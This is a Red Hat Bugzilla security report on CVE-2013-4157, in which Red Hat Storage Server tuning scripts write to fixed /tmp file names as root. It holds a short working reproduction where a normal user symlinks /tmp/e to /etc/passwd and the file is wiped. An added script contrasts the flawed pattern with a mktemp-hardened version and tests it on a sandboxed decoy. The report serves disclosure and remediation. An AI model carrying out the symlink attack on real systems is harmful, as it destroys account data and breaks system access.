Bug 986516 (CVE-2013-4157) - CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-server /tmp file creation vuln
Alias: CVE-2013-4157
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 986517 986518
Blocks: 986520
Reported: 2013-07-20 04:52 UTC by Kurt Seifried
Modified: 2019-09-29 13:06 UTC

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2013-09-04 18:48:25 UTC

System | ID | Priority | Status | Summary | Last Updated
Red Hat Product Errata | RHSA-2013:1205 | normal | SHIPPED_LIVE | Low: Red Hat Storage 2.0 security, bug fix, and enhancement update #6 | 2013-09-04 22:09:23 UTC

Description Kurt Seifried 2013-07-20 04:52:15 UTC
Gowrishankar Rajaiyan (grajaiya@redhat.com) reports:

I found a potential security issue with 
redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as 
appliance-base-1.7.3-1.el6rhs while verifying 
https://bugzilla.redhat.com/show_bug.cgi?id=910566. This issue also 
exists in the latest released version of RHS 
https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689

Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh 
and /etc/tune-profiles/rhs-virtualization/ktune.sh
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do

A file "e" is created in /tmp directory. This information is public at 
https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 (I set it to 
private now, not sure if that helps). So any normal user can create a 
softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as 
root user, hence, exposes a security loophole wherein a normal user 
can wipe out /etc/passwd.

Please guide on how to proceed from here.

A demonstration is as follows:
As normal user:
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/

[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log
-rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root root 0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on 
brick devices:
[ OK ]
Reverting to cfq elevator: dm-0 dm-1 [ OK ]
Stopping tuned: [ OK ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on 
brick devices:
[ OK ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1 [ OK ]
Starting tuned: 'import site' failed; use -v for traceback
[ OK ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#

Comment 3 Kurt Seifried 2013-07-20 05:30:57 UTC
Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:          done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:          echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:          done) 2>> /tmp/bricks.err
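
The fixed-name redirect from the report and from Comment 3, set beside a hardened form, as an added example that is not part of the original bug report or the shipped fix. The function names, the `ktune.` template prefix and the sandbox layout are assumptions.

```shell
#!/bin/sh
# Added example: not the shipped ktune.sh and not the RHSA-2013:1205 patch.
# Function names and the sandbox layout are assumptions for illustration.

# Pattern from the report: stderr is redirected to a fixed name in a
# world-writable directory, so the shell opens whatever already sits there,
# including a symlink planted by another user.
# $1 = directory to search, $2 = fixed error-file path
list_bricks_predictable() {
    find "$1" -name bricks -type d 2>"$2"
}

# Hardened form: mktemp -d creates a new mode-0700 directory with an
# unpredictable name and fails if that name already exists, so no
# pre-planted entry can be followed.
# $1 = directory to search, $2 = optional base for the private directory
list_bricks_private() {
    workdir=$(mktemp -d "${2:-${TMPDIR:-/tmp}}/ktune.XXXXXXXXXX") || return 1
    rc=0
    find "$1" -name bricks -type d 2>"$workdir/find.err" || rc=$?
    if [ -s "$workdir/find.err" ]; then cat "$workdir/find.err" >&2; fi
    rm -rf -- "$workdir"
    return "$rc"
}

# Regression check in a throwaway sandbox: a decoy file stands in for the
# sensitive target and a symlink named "e" points at it, as in the report.
# $1 = name of the function to check; prints "clobbered" or "intact".
check_decoy() {
    box=$(mktemp -d) || return 1
    mkdir -p "$box/vols/vol0/bricks" "$box/tmp"
    echo "decoy contents" >"$box/decoy"
    ln -s "$box/decoy" "$box/tmp/e"
    if [ "$1" = list_bricks_predictable ]; then
        list_bricks_predictable "$box/vols" "$box/tmp/e" >/dev/null
    else
        list_bricks_private "$box/vols" "$box/tmp" >/dev/null
    fi
    if [ -s "$box/decoy" ]; then result=intact; else result=clobbered; fi
    rm -rf -- "$box"
    echo "$result"
}
```

The sandbox directory is neither sticky nor world-writable and both files belong to the same user, so the kernel's `fs.protected_symlinks` restriction does not affect the check.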

Comment 4 Murray McAllister 2013-09-04 11:34:45 UTC

These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.

Comment 5 errata-xmlrpc 2013-09-04 18:10:55 UTC
This issue has been addressed in the following products:

  Red Hat Storage 2.0

Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html
